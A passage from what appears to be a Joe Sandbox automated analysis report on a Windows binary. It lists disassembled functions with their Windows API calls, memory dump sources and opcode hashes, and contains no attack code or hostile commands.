                                                                                                                                                                                                                                                                                                        • Instruction ID: f9205ae31db05b9c3e77d0985b0ed2a32128f774b51f4989d9f1137d4a0a37b6
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 239a4af11f55f81595298fdd8f27fa6654470999d4af52818c577849b92c20b2
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: A3B15C71800209EFCF29DFA4E8859AEBBB5FF14310F14455AE815AB212D739EE51CF92
                                                                                                                                                                                                                                                                                                        Function 004F34D0 Relevance: 11.4, APIs: 9, Instructions: 158COMMON
                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • EnterCriticalSection.KERNEL32(?,00000000,?,?,?,?,004F5BA3,00000000), ref: 004F34EA
                                                                                                                                                                                                                                                                                                        • EnterCriticalSection.KERNEL32(?,?,004F5BA3,00000000), ref: 004F3537
                                                                                                                                                                                                                                                                                                        • LeaveCriticalSection.KERNEL32(?,?,004F5BA3,00000000), ref: 004F3545
                                                                                                                                                                                                                                                                                                        • EnterCriticalSection.KERNEL32(?,?,004F5BA3,00000000), ref: 004F3556
                                                                                                                                                                                                                                                                                                        • LeaveCriticalSection.KERNEL32(?,?,004F5BA3,00000000), ref: 004F355F
                                                                                                                                                                                                                                                                                                        • EnterCriticalSection.KERNEL32(?,?,004F5BA3,00000000), ref: 004F3594
                                                                                                                                                                                                                                                                                                        • LeaveCriticalSection.KERNEL32(?,?,004F5BA3,00000000), ref: 004F359D
                                                                                                                                                                                                                                                                                                        • EnterCriticalSection.KERNEL32(?,?,004F5BA3,00000000), ref: 004F36AD
                                                                                                                                                                                                                                                                                                        • LeaveCriticalSection.KERNEL32(?,?,004F5BA3,00000000), ref: 004F36BB
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 00000022.00000002.1908084668.0000000000401000.00000020.00000001.01000000.00000010.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 00000022.00000002.1908053339.0000000000400000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000022.00000002.1908489056.000000000053D000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000022.00000002.1908563516.0000000000555000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000022.00000002.1908563516.0000000000562000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000022.00000002.1909113783.0000000000628000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000022.00000002.1909113783.00000000006E7000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000022.00000002.1909113783.00000000006F5000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000022.00000002.1909113783.0000000000700000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000022.00000002.1909113783.000000000073C000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_34_2_400000_1061714629.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: CriticalSection$Enter$Leave
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 2801635615-0
                                                                                                                                                                                                                                                                                                        • Opcode ID: 2acf0627a9549dec7f7e43e10a8dfb91ca38bb9d58e4ce9ffdfa8fec1b5a1733
                                                                                                                                                                                                                                                                                                        • Instruction ID: 93c01fc31a9ee7373f9c1d93048bf40271cec5808ab28bfcb2eca2428eaae834
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 2acf0627a9549dec7f7e43e10a8dfb91ca38bb9d58e4ce9ffdfa8fec1b5a1733
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 1F51BE3020474A9BD7249F319558BBBBBF8AF84742F04485EE5DEC3361DB28EA08C724
                                                                                                                                                                                                                                                                                                        Function 004F36F0 Relevance: 11.3, APIs: 9, Instructions: 87COMMON
                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • EnterCriticalSection.KERNEL32(?,?,?,?), ref: 004F3709
                                                                                                                                                                                                                                                                                                        • EnterCriticalSection.KERNEL32(?,00000000), ref: 004F374C
                                                                                                                                                                                                                                                                                                        • LeaveCriticalSection.KERNEL32(?,?), ref: 004F375C
                                                                                                                                                                                                                                                                                                        • EnterCriticalSection.KERNEL32(?), ref: 004F376D
                                                                                                                                                                                                                                                                                                        • LeaveCriticalSection.KERNEL32(?), ref: 004F377A
                                                                                                                                                                                                                                                                                                        • LeaveCriticalSection.KERNEL32(?), ref: 004F37A9
                                                                                                                                                                                                                                                                                                        • EnterCriticalSection.KERNEL32(?,00000000), ref: 004F37C5
                                                                                                                                                                                                                                                                                                        • LeaveCriticalSection.KERNEL32(?,?), ref: 004F37D5
                                                                                                                                                                                                                                                                                                        • LeaveCriticalSection.KERNEL32(?), ref: 004F37EC
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 00000022.00000002.1908084668.0000000000401000.00000020.00000001.01000000.00000010.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 00000022.00000002.1908053339.0000000000400000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000022.00000002.1908489056.000000000053D000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000022.00000002.1908563516.0000000000555000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000022.00000002.1908563516.0000000000562000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000022.00000002.1909113783.0000000000628000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000022.00000002.1909113783.00000000006E7000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000022.00000002.1909113783.00000000006F5000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000022.00000002.1909113783.0000000000700000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000022.00000002.1909113783.000000000073C000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_34_2_400000_1061714629.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: CriticalSection$Leave$Enter
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 2978645861-0
                                                                                                                                                                                                                                                                                                        • Opcode ID: 318028bd3e644244c467fd2509390a4b47584e5d5e6a88b99469994f74e86a6d
                                                                                                                                                                                                                                                                                                        • Instruction ID: 1822ab8b2bc00c4b335a7296647f06df4fe24da2c1cedc303b1505dbbb5a7089
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 318028bd3e644244c467fd2509390a4b47584e5d5e6a88b99469994f74e86a6d
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 2831D1B11087894BC610AF35A9807EBFBF8BF89714F04499DE5E953251C734AA1DC726
                                                                                                                                                                                                                                                                                                        Function 0079D940 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 120COMMON
                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • _ValidateLocalCookies.LIBCMT ref: 0079D977
                                                                                                                                                                                                                                                                                                        • ___except_validate_context_record.LIBVCRUNTIME ref: 0079D97F
                                                                                                                                                                                                                                                                                                        • _ValidateLocalCookies.LIBCMT ref: 0079DA08
                                                                                                                                                                                                                                                                                                        • __IsNonwritableInCurrentImage.LIBCMT ref: 0079DA33
                                                                                                                                                                                                                                                                                                        • _ValidateLocalCookies.LIBCMT ref: 0079DA88
                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 00000022.00000003.1903619913.0000000000770000.00000040.00000400.00020000.00000000.sdmp, Offset: 00770000, based on PE: true
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_34_3_770000_1061714629.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                                                                                                                                                                                                                                        • String ID: csm
                                                                                                                                                                                                                                                                                                        • API String ID: 1170836740-1018135373
                                                                                                                                                                                                                                                                                                        • Opcode ID: 37b7ffcd75580574b2bed498a0d55029e147ec6556988c79b4e43bfdd644b3e9
                                                                                                                                                                                                                                                                                                        • Instruction ID: e60fa94935fac86d4f2411bee0f06bae9fa08a52f082d528d61211fb7b327bd8
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 37b7ffcd75580574b2bed498a0d55029e147ec6556988c79b4e43bfdd644b3e9
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 8B41D634A04208DFCF20DF68E885A9E7BB5FF45324F14C155E9196B392D739AD11CB91
                                                                                                                                                                                                                                                                                                        Function 004D7D40 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 102COMMON
                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 00000022.00000002.1908084668.0000000000401000.00000020.00000001.01000000.00000010.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 00000022.00000002.1908053339.0000000000400000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000022.00000002.1908489056.000000000053D000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000022.00000002.1908563516.0000000000555000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000022.00000002.1908563516.0000000000562000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000022.00000002.1909113783.0000000000628000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000022.00000002.1909113783.00000000006E7000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000022.00000002.1909113783.00000000006F5000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000022.00000002.1909113783.0000000000700000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000022.00000002.1909113783.000000000073C000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_34_2_400000_1061714629.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                                                        • String ID: localhost
                                                                                                                                                                                                                                                                                                        • API String ID: 0-2663516195
                                                                                                                                                                                                                                                                                                        • Opcode ID: a84127021668ac66c92549beb1820c1694ea4c36d481015665288550d8e57417
                                                                                                                                                                                                                                                                                                        • Instruction ID: cf482c115b2fa46a5b5609c5aae3d134ea41c2cdeafd480f3feffcf81808ee73
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: a84127021668ac66c92549beb1820c1694ea4c36d481015665288550d8e57417
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 9131ED30208311ABDB20DF249C85BBBB7E5FF95710F004A1EF9559B381E7719948C7A6
                                                                                                                                                                                                                                                                                                        Function 004144DE Relevance: 9.1, APIs: 1, Strings: 4, Instructions: 324timeCOMMON
                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • timeGetTime.WINMM(00000000), ref: 004145E1
                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 00000022.00000002.1908084668.0000000000401000.00000020.00000001.01000000.00000010.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 00000022.00000002.1908053339.0000000000400000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000022.00000002.1908489056.000000000053D000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000022.00000002.1908563516.0000000000555000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000022.00000002.1908563516.0000000000562000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000022.00000002.1909113783.0000000000628000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000022.00000002.1909113783.00000000006E7000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000022.00000002.1909113783.00000000006F5000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000022.00000002.1909113783.0000000000700000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000022.00000002.1909113783.000000000073C000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_34_2_400000_1061714629.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: Timetime
                                                                                                                                                                                                                                                                                                        • String ID: gfff$gfff$gfff$gfff
                                                                                                                                                                                                                                                                                                        • API String ID: 17336451-2178600047
                                                                                                                                                                                                                                                                                                        • Opcode ID: 36ada0748ce7ae867fc8d0b968c8e92e83edef51ded80e37bf17f681d92f4674
                                                                                                                                                                                                                                                                                                        • Instruction ID: e32ce3efbecf0e845fb5c017bd6949167df468d5a0ad1b28c98723774e94ba96
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 36ada0748ce7ae867fc8d0b968c8e92e83edef51ded80e37bf17f681d92f4674
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 79C17E313046059BD718DF15C494BEA77A6BFC8704F18856EE8498F382CB79ED42CB9A
                                                                                                                                                                                                                                                                                                        Function 004D8B00 Relevance: 9.1, APIs: 6, Instructions: 53sleepCOMMON
                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • timeKillEvent.WINMM(?,?,?,00000000,?,0041D4A9), ref: 004D8B13
                                                                                                                                                                                                                                                                                                        • Sleep.KERNEL32(00000001,?,0041D4A9), ref: 004D8B2D
                                                                                                                                                                                                                                                                                                        • waveOutReset.WINMM(?,?,0041D4A9), ref: 004D8B34
                                                                                                                                                                                                                                                                                                        • waveOutUnprepareHeader.WINMM(?,-000013C4,00000020,?,?,0041D4A9), ref: 004D8B5A
                                                                                                                                                                                                                                                                                                        • Sleep.KERNEL32(00000001,?,?,0041D4A9), ref: 004D8B63
                                                                                                                                                                                                                                                                                                        • waveOutClose.WINMM(?,?,0041D4A9), ref: 004D8B86
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 00000022.00000002.1908084668.0000000000401000.00000020.00000001.01000000.00000010.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 00000022.00000002.1908053339.0000000000400000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000022.00000002.1908489056.000000000053D000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000022.00000002.1908563516.0000000000555000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000022.00000002.1908563516.0000000000562000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000022.00000002.1909113783.0000000000628000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000022.00000002.1909113783.00000000006E7000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000022.00000002.1909113783.00000000006F5000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000022.00000002.1909113783.0000000000700000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000022.00000002.1909113783.000000000073C000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_34_2_400000_1061714629.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: wave$Sleep$CloseEventHeaderKillResetUnpreparetime
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 3030913982-0
                                                                                                                                                                                                                                                                                                        • Opcode ID: 8109bb966e39f4028d6bd6d558cf8393c4574c35e2cabacb2eafa3e008f2b1ca
                                                                                                                                                                                                                                                                                                        • Instruction ID: 723e303dfaa0e6e3e16fcc3d7d301ea8209cd941138754b25ec6b12d62c8e06b
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 8109bb966e39f4028d6bd6d558cf8393c4574c35e2cabacb2eafa3e008f2b1ca
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 0401ADB5A00214ABC3149F14EC88AAEB7F8FB98B11F00091BF41497301CB79A9598BF5
                                                                                                                                                                                                                                                                                                        Function 004CF830 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 160fileCOMMON
                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000002,-00000001,00000000,?,?,?,00000000,2E736D6D,?,?,00000000,00000000), ref: 004CF94E
                                                                                                                                                                                                                                                                                                        • CreateFileA.KERNEL32(00000000,C0000000,00000000,00000000,00000002,-00000001,00000000,00000000,2E736D6D,?,?,00000000,00000000), ref: 004CF99D
                                                                                                                                                                                                                                                                                                        • CreateFileA.KERNEL32(?,C0000000,00000000,00000000,00000002,-00000001,00000000), ref: 004CF9BF
                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 00000022.00000002.1908084668.0000000000401000.00000020.00000001.01000000.00000010.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 00000022.00000002.1908053339.0000000000400000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000022.00000002.1908489056.000000000053D000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000022.00000002.1908563516.0000000000555000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000022.00000002.1908563516.0000000000562000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000022.00000002.1909113783.0000000000628000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000022.00000002.1909113783.00000000006E7000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000022.00000002.1909113783.00000000006F5000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000022.00000002.1909113783.0000000000700000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000022.00000002.1909113783.000000000073C000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_34_2_400000_1061714629.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: CreateFile
                                                                                                                                                                                                                                                                                                        • String ID: \\?\
                                                                                                                                                                                                                                                                                                        • API String ID: 823142352-4282027825
                                                                                                                                                                                                                                                                                                        • Opcode ID: daeb41911831d80bc6e531fad3d0e57e46336e4ff8e700678b0c9ea4e3aad5f5
                                                                                                                                                                                                                                                                                                        • Instruction ID: d900b4c61e2357813c95f9d4093febd61d3ae0210469f6574eac6d9984f09979
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: daeb41911831d80bc6e531fad3d0e57e46336e4ff8e700678b0c9ea4e3aad5f5
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: A141C2B5904300BBEB50EB21DC86F1B77A9EB89348F24092EF54597381D63DDC48C7A6
                                                                                                                                                                                                                                                                                                        Function 004DD6F0 Relevance: 8.8, APIs: 7, Instructions: 54COMMON
                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • EnterCriticalSection.KERNEL32(?,00000000,?,?,004DDFDB,000000FF,00000001,004DE7BA), ref: 004DD6FC
                                                                                                                                                                                                                                                                                                        • EnterCriticalSection.KERNEL32(?), ref: 004DD71E
                                                                                                                                                                                                                                                                                                          • Part of subcall function 004FA760: EnterCriticalSection.KERNEL32(?,?,00000000,0015381C,?,004DD732), ref: 004FA76A
                                                                                                                                                                                                                                                                                                          • Part of subcall function 004FA760: LeaveCriticalSection.KERNEL32(?), ref: 004FA77A
                                                                                                                                                                                                                                                                                                          • Part of subcall function 004DC9A0: EnterCriticalSection.KERNEL32 ref: 004DCA0C
                                                                                                                                                                                                                                                                                                          • Part of subcall function 004DC9A0: LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,?), ref: 004DCA1D
                                                                                                                                                                                                                                                                                                        • LeaveCriticalSection.KERNEL32(?), ref: 004DD741
                                                                                                                                                                                                                                                                                                        • LeaveCriticalSection.KERNEL32(?), ref: 004DD744
                                                                                                                                                                                                                                                                                                        • EnterCriticalSection.KERNEL32(?), ref: 004DD74C
                                                                                                                                                                                                                                                                                                        • LeaveCriticalSection.KERNEL32(?), ref: 004DD771
                                                                                                                                                                                                                                                                                                        • LeaveCriticalSection.KERNEL32(?), ref: 004DD774
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 00000022.00000002.1908084668.0000000000401000.00000020.00000001.01000000.00000010.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 00000022.00000002.1908053339.0000000000400000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000022.00000002.1908489056.000000000053D000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000022.00000002.1908563516.0000000000555000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000022.00000002.1908563516.0000000000562000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000022.00000002.1909113783.0000000000628000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000022.00000002.1909113783.00000000006E7000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000022.00000002.1909113783.00000000006F5000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000022.00000002.1909113783.0000000000700000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000022.00000002.1909113783.000000000073C000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_34_2_400000_1061714629.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: CriticalSection$Leave$Enter
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 2978645861-0
                                                                                                                                                                                                                                                                                                        • Opcode ID: ff1ce3d31db78686b43d8a54f5086c5c7705279757a9b448e26e3c6c897d228c
                                                                                                                                                                                                                                                                                                        • Instruction ID: 32add75de912499d63db8df7e296ef1919b4cd71e3024a8d459c2c8f380e6b48
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: ff1ce3d31db78686b43d8a54f5086c5c7705279757a9b448e26e3c6c897d228c
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 59012975302A155FD324EB2ADC90B6BE3F9AF91354F00842FE546C3750CB64FC058AA9
                                                                                                                                                                                                                                                                                                        Function 004D8640 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 36COMMON
                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • CreateWindowExA.USER32(00000000,STATIC,Dummy,80000000,00000000,00000000,00000005,00000005,00000000,00000000,00000000,00000000), ref: 004D866B
                                                                                                                                                                                                                                                                                                        • SetWindowLongA.USER32(00000000,000000EB,00000000), ref: 004D8683
                                                                                                                                                                                                                                                                                                        • SetWindowLongA.USER32(?,000000FC,004D8520), ref: 004D8690
                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 00000022.00000002.1908084668.0000000000401000.00000020.00000001.01000000.00000010.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 00000022.00000002.1908053339.0000000000400000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000022.00000002.1908489056.000000000053D000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000022.00000002.1908563516.0000000000555000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000022.00000002.1908563516.0000000000562000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000022.00000002.1909113783.0000000000628000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000022.00000002.1909113783.00000000006E7000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000022.00000002.1909113783.00000000006F5000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000022.00000002.1909113783.0000000000700000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000022.00000002.1909113783.000000000073C000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_34_2_400000_1061714629.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: Window$Long$Create
                                                                                                                                                                                                                                                                                                        • String ID: Dummy$STATIC
                                                                                                                                                                                                                                                                                                        • API String ID: 1733017098-132613206
                                                                                                                                                                                                                                                                                                        • Opcode ID: fd32e9f0fa554accdce7ab5b00cc8db694d7956c6883c39d3d5e1831a2aabb4c
                                                                                                                                                                                                                                                                                                        • Instruction ID: 60c9263fdfddd51d1a46959990d996e43c4a0f9c9599785539e6d357df671051
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: fd32e9f0fa554accdce7ab5b00cc8db694d7956c6883c39d3d5e1831a2aabb4c
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 35F0303138471076E630A66ABC06F57B6EC9B59F31F21071AB319F76E0DAE0F8004A2C
                                                                                                                                                                                                                                                                                                        Function 004F5A70 Relevance: 7.6, APIs: 6, Instructions: 129COMMON
                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • EnterCriticalSection.KERNEL32(?,00000010,?,00000000,00000000,004EF87C,?,?,004AC02B,?,?), ref: 004F5A80
